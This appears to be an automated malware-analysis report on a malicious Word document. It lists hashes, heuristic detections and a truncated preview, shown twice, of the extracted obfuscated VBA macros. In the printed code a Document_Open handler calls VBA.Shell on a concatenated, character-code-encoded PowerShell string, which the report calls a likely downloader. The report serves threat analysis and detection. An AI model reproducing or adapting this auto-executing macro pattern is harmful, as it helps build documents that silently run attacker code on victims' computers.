Office (OLE) malware analysis — malicious · 1093633c9f2ec469

MALICIOUS

Office (OLE)

92.5 KB Created: 2018-06-13 12:44:00 Authoring application: Microsoft Office Word First seen: 2019-12-09

MD5: f37ac5d9005af2fd088a1a5cb5a10263 SHA-1: 9c4ffdc4a45fe815db62eb87cf30a11fcff470d1 SHA-256: 1093633c9f2ec469e0c8d4e266cfa3175625a1eddccbfbe205d4832a43c2d388

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The `Document_Open` macro triggers a `Shell()` call, which is highly indicative of downloading and executing a second-stage payload. The reconstructed shell command appears to be constructing a PowerShell execution string, suggesting a downloader or dropper functionality.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13158 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13158 bytes
SHA-256: `3ac4796d4524cce0a56ed7ac8cee51a6da20366cb95654b9be532c10e27e6fe9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "SmRFupqVTMrFT" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function WnosGf() On Error Resume Next FFmiB = Tan(65466) Cnulcw = CDbl(knXNdl) SkLjM = CDbl(qRPEu * CDbl(iiXWm + Int(NOTjH * Rnd(29362)) * ciSEm * Log(36627 * Bbjjk - ANkGEA + Fix(51)))) QwPMja = Tan(44928) ECKkR = YUqQB DCwql = PAiNc SCjdh = Tan(4879) oNhkA = CDbl(VMbrM) bPmCCo = CDbl(QbLCIj * CDbl(VoiNs + Int(KYtwpV * Rnd(8003)) * zFzbRU * Log(2437 * UuTGBm - jUFAki + Fix(51)))) HzWvo = Tan(4375) sWOhu = oAQZM cTntl = YwMdjV EzYEL = Tan(18979) TztYA = CDbl(ODQQaH) cGjiIv = CDbl(JGJKdM * CDbl(wViPh + Int(ZJGnG * Rnd(14537)) * jFpsk * Log(42487 * qzQIow - dsMVDa + Fix(51)))) Dznwu = Tan(76425) wWjhmW = TGUsN awFZbi = vRtSC vqdbU = Tan(88882) hdEJJp = CDbl(PzMHE) ufFrzd = CDbl(wTCFbV * CDbl(Wmvzc + Int(vNCAi * Rnd(79893)) * PiVpzW * Log(14619 * iXPRKv - zVtwN + Fix(51)))) JcHQoZ = Tan(23514) XwXjn = dZbwv jsOji = FhOjH WnosGf = JlvhnDouvN + VBA.Shell(dtFSD + Chr(ZPFMpR + vbKeyP + QmhHmwK) + "owers" + jHfAM + lPMwjGYAF + cttdVwvwvs + PQWkfv + wialDwDhZ, 80821 - 80821) znbzKH = Tan(31870) MLfXTG = CDbl(jGZcc) znDczt = CDbl(oSSwz * CDbl(hVuXE + Int(ibGarw * Rnd(49707)) * wXiMX * Log(41258 * cjQPuU - npmEUi + Fix(51)))) bTTrsN = Tan(56582) HFBSGI = hwBJl odHKi = nQonb LqcpSd = Tan(13272) qmvwCV = CDbl(RQQTw) UKKTm = CDbl(DdcYYD * CDbl(UJjcrM + Int(zWUXX * Rnd(77308)) * iQLHHj * Log(71118 * mancjK - Gwhfp + Fix(51)))) zwkGPM = Tan(27247) jUFjWA = WFjfr WGpOjE = PYqswz End Function Private Sub Document_open() On Error Resume Next wbiNRo = Tan(83139) KwHZXX = CDbl(wPwnGX) kmbmZI = CDbl(RwDzFw * CDbl(iwaNRI + Int(SwjCPK * Rnd(50479)) * YfFGiq * Log(91288 * CjVzir - iYqBGh + Fix(51)))) aiSpG = Tan(57852) wnridp = pfRMtq wIwaKE = YJTKih fjnUO = Tan(13050) JakjS = CDbl(pkofZ) ZRqdmG = CDbl(poPoqP * CDbl(vYjGE + Int(YQrGu * Rnd(38325)) * wEzjP * Log(30575 * wChdNN - iDqfZU + Fix(51)))) YUYGAT = Tan(42472) rFUQk = bETbSR RbsqDs = bqNBaU WnosGf jmthi = Tan(60780) Wwbdpw = CDbl(ziosY) nqkbW = CDbl(PvZJOT * CDbl(YNcQY + Int(YlQtJ * Rnd(95579)) * hswqUV * Log(90561 * djbnid - tCnfbK + Fix(51)))) CRXMOB = Tan(17532) pbwtvK = zOKFzD uhAdt = vsOGdV YrsJh = Tan(93476) uGnFlv = CDbl(luwMiG) naClP = CDbl(ukuHqz * CDbl(RnNll + Int(FIjnz * Rnd(99901)) * DIpwv * Log(15409 * SkkGah - sfvztD + Fix(51)))) LJLzn = Tan(75417) qHjAJ = iGvTwm hCGLDD = dloDw End Sub Attribute VB_Name = "fQwmNLKXd" Function jHfAM() On Error Resume Next BsZVWJ = CDbl(dNcVuj) vdjou = Tan(47994) YVhjh = vkAtt qSuhP = NszzY FnRNH = CDbl(wRJHzW * CDbl(lwZwn + Int(JANOv * Rnd(81813)) * NVDjmD * Log(75382 * vjiQY - vHPRXK + Fix(51)))) vCVmM = Tan(48190) HInMcLML = "HeLL [striNG" + "]::JOIn('', ( '" + "11o95-" + "73S105o102," + "105-15p18l15o" + "65l74,8" + "8o2p64S7" + "7T69g7" + "4,76-91-15S" SapRzF = CDbl(KjaClB) fSSiuZ = Tan(58867) BDHJu = WStmw cYtUoB = dfajO bDFkaE = CDbl(DXIubz * CDbl(dJKfiv + Int(jNmKl * Rnd(75431)) * wuwLBu * Log(9789 * NiHpba - sJfLDl + Fix(51)))) IODAN = Tan(88837) MwDlcJT = "93S" + "78I6" + "5o" + "75{64g66{20l11-" + "107g" jopFv = CDbl(kUzQFA) mkHAhK = Tan(70904) IRXdVD = ZEISjR ifENIC = HDfwRj pKjYsW = CDbl(vOhjUp * CDbl(cZVaR + Int(UGVqT * Rnd(95626)) * DaRRiT * Log(12707 * wUIROG - CpuBO + Fix(51)))) zimrS = Tan(31224) rCkEGGIcW = "118p108-73S70" + "T15,18T1" + "5T65g74" + "{88l2{" rLuAP = CDbl(szqhCl) FviaLD = Tan(89617) HfCWi = sFZoA HHrDN = zPwnYn iSZZiQ = CDbl(EfJto * CDbl(GfYSp + Int(woTXZK * Rnd(72955)) * YOzGH * Log(32626 * znVEr - hpfwlO + Fix(51)))) YqTnj = Tan(90895) PwNbDim = "64S77g6" + "9g74T7" + "6I91-15l124" + ",86o92,9" + "1-74-66I1o9" + "7I74S" + "91T1p120{7" hIzzjC = CDbl(DJtisY) azhvKW = Tan(23739) MosVp = DkzwvA wJhQn = KlaDcX DQwQal = CDbl(osXVMT * CDbl(sPvXj + Int(KuTzh * Rnd(45537)) * ufzpc * Log(76043 * Xjiik - OYTQWJ + Fix(51)))) YKUDa ... (truncated)

SHA-256: 3ac4796d4524cce0a56ed7ac8cee51a6da20366cb95654b9be532c10e27e6fe9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "SmRFupqVTMrFT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function WnosGf()
On Error Resume Next
FFmiB = Tan(65466)
Cnulcw = CDbl(knXNdl)
SkLjM = CDbl(qRPEu * CDbl(iiXWm + Int(NOTjH * Rnd(29362)) * ciSEm * Log(36627 * Bbjjk - ANkGEA + Fix(51))))
QwPMja = Tan(44928)
ECKkR = YUqQB
DCwql = PAiNc
SCjdh = Tan(4879)
oNhkA = CDbl(VMbrM)
bPmCCo = CDbl(QbLCIj * CDbl(VoiNs + Int(KYtwpV * Rnd(8003)) * zFzbRU * Log(2437 * UuTGBm - jUFAki + Fix(51))))
HzWvo = Tan(4375)
sWOhu = oAQZM
cTntl = YwMdjV
EzYEL = Tan(18979)
TztYA = CDbl(ODQQaH)
cGjiIv = CDbl(JGJKdM * CDbl(wViPh + Int(ZJGnG * Rnd(14537)) * jFpsk * Log(42487 * qzQIow - dsMVDa + Fix(51))))
Dznwu = Tan(76425)
wWjhmW = TGUsN
awFZbi = vRtSC
vqdbU = Tan(88882)
hdEJJp = CDbl(PzMHE)
ufFrzd = CDbl(wTCFbV * CDbl(Wmvzc + Int(vNCAi * Rnd(79893)) * PiVpzW * Log(14619 * iXPRKv - zVtwN + Fix(51))))
JcHQoZ = Tan(23514)
XwXjn = dZbwv
jsOji = FhOjH
WnosGf = JlvhnDouvN + VBA.Shell(dtFSD + Chr(ZPFMpR + vbKeyP + QmhHmwK) + "owers" + jHfAM + lPMwjGYAF + cttdVwvwvs + PQWkfv + wialDwDhZ, 80821 - 80821)
znbzKH = Tan(31870)
MLfXTG = CDbl(jGZcc)
znDczt = CDbl(oSSwz * CDbl(hVuXE + Int(ibGarw * Rnd(49707)) * wXiMX * Log(41258 * cjQPuU - npmEUi + Fix(51))))
bTTrsN = Tan(56582)
HFBSGI = hwBJl
odHKi = nQonb
LqcpSd = Tan(13272)
qmvwCV = CDbl(RQQTw)
UKKTm = CDbl(DdcYYD * CDbl(UJjcrM + Int(zWUXX * Rnd(77308)) * iQLHHj * Log(71118 * mancjK - Gwhfp + Fix(51))))
zwkGPM = Tan(27247)
jUFjWA = WFjfr
WGpOjE = PYqswz
End Function
Private Sub Document_open()
On Error Resume Next
wbiNRo = Tan(83139)
KwHZXX = CDbl(wPwnGX)
kmbmZI = CDbl(RwDzFw * CDbl(iwaNRI + Int(SwjCPK * Rnd(50479)) * YfFGiq * Log(91288 * CjVzir - iYqBGh + Fix(51))))
aiSpG = Tan(57852)
wnridp = pfRMtq
wIwaKE = YJTKih
fjnUO = Tan(13050)
JakjS = CDbl(pkofZ)
ZRqdmG = CDbl(poPoqP * CDbl(vYjGE + Int(YQrGu * Rnd(38325)) * wEzjP * Log(30575 * wChdNN - iDqfZU + Fix(51))))
YUYGAT = Tan(42472)
rFUQk = bETbSR
RbsqDs = bqNBaU
WnosGf
jmthi = Tan(60780)
Wwbdpw = CDbl(ziosY)
nqkbW = CDbl(PvZJOT * CDbl(YNcQY + Int(YlQtJ * Rnd(95579)) * hswqUV * Log(90561 * djbnid - tCnfbK + Fix(51))))
CRXMOB = Tan(17532)
pbwtvK = zOKFzD
uhAdt = vsOGdV
YrsJh = Tan(93476)
uGnFlv = CDbl(luwMiG)
naClP = CDbl(ukuHqz * CDbl(RnNll + Int(FIjnz * Rnd(99901)) * DIpwv * Log(15409 * SkkGah - sfvztD + Fix(51))))
LJLzn = Tan(75417)
qHjAJ = iGvTwm
hCGLDD = dloDw
End Sub


Attribute VB_Name = "fQwmNLKXd"
Function jHfAM()
On Error Resume Next
BsZVWJ = CDbl(dNcVuj)
vdjou = Tan(47994)
YVhjh = vkAtt
qSuhP = NszzY
FnRNH = CDbl(wRJHzW * CDbl(lwZwn + Int(JANOv * Rnd(81813)) * NVDjmD * Log(75382 * vjiQY - vHPRXK + Fix(51))))
vCVmM = Tan(48190)
HInMcLML = "HeLL  [striNG" + "]::JOIn('', ( '" + "11o95-" + "73S105o102," + "105-15p18l15o" + "65l74,8" + "8o2p64S7" + "7T69g7" + "4,76-91-15S"
SapRzF = CDbl(KjaClB)
fSSiuZ = Tan(58867)
BDHJu = WStmw
cYtUoB = dfajO
bDFkaE = CDbl(DXIubz * CDbl(dJKfiv + Int(jNmKl * Rnd(75431)) * wuwLBu * Log(9789 * NiHpba - sJfLDl + Fix(51))))
IODAN = Tan(88837)
MwDlcJT = "93S" + "78I6" + "5o" + "75{64g66{20l11-" + "107g"
jopFv = CDbl(kUzQFA)
mkHAhK = Tan(70904)
IRXdVD = ZEISjR
ifENIC = HDfwRj
pKjYsW = CDbl(vOhjUp * CDbl(cZVaR + Int(UGVqT * Rnd(95626)) * DaRRiT * Log(12707 * wUIROG - CpuBO + Fix(51))))
zimrS = Tan(31224)
rCkEGGIcW = "118p108-73S70" + "T15,18T1" + "5T65g74" + "{88l2{"
rLuAP = CDbl(szqhCl)
FviaLD = Tan(89617)
HfCWi = sFZoA
HHrDN = zPwnYn
iSZZiQ = CDbl(EfJto * CDbl(GfYSp + Int(woTXZK * Rnd(72955)) * YOzGH * Log(32626 * znVEr - hpfwlO + Fix(51))))
YqTnj = Tan(90895)
PwNbDim = "64S77g6" + "9g74T7" + "6I91-15l124" + ",86o92,9" + "1-74-66I1o9" + "7I74S" + "91T1p120{7"
hIzzjC = CDbl(DJtisY)
azhvKW = Tan(23739)
MosVp = DkzwvA
wJhQn = KlaDcX
DQwQal = CDbl(osXVMT * CDbl(sPvXj + Int(KuTzh * Rnd(45537)) * ufzpc * Log(76043 * Xjiik - OYTQWJ + Fix(51))))
YKUDa 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.